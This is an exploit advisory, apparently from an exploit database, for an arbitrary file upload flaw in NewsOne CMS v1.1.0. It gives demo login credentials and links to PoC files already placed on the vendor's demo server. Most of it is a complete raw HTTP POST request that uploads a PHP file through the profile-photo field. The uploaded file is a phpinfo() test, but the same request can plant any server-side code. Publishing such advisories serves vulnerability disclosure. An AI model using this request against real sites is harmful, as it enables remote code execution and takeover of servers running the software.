# Exploit Title: NewsOne CMS – News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage: http://www.newsone.dx.am/index/index
# Software Link: https://codecanyon.net/item/newsone-news-magazine-blog-script/25384256
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434
----[]- Info: -[]----
Demo website: http://www.newsone.dx.am/index/index
Demo account: member/member12345 (login/password)
PoC Upload #0: http://www.newsone.dx.am/Application/Content/uploads/profile/up-up.php
PoC Upload #1: http://www.newsone.dx.am/Application/Content/uploads/profile/index.html
PoC Upload #2: http://www.newsone.dx.am/Application/Content/uploads/profile/up.phtml
PoC Upload #3: http://www.newsone.dx.am/Application/Content/uploads/profile/poc.php?m0ze&email=_your_email_here_
----[]- Arbitrary File Upload -> User Profile: -[]----
Auth as a regular user (member/member12345 for example) and upload any file you want on the http://www.newsone.dx.am/auth/edit page via <input type="file" name="user_image"> field.
PoC:
POST /auth/edit HTTP/1.1
Host: www.newsone.dx.am
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Origin: http://www.newsone.dx.am
Connection: close
Referer: http://www.newsone.dx.am/auth/edit
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1
-----------------------------18467633426500
Content-Disposition: form-data; name="member_id"
4
-----------------------------18467633426500
Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------18467633426500
Content-Disposition: form-data; name="edit_user_photo"
Update Profile Photo
-----------------------------18467633426500--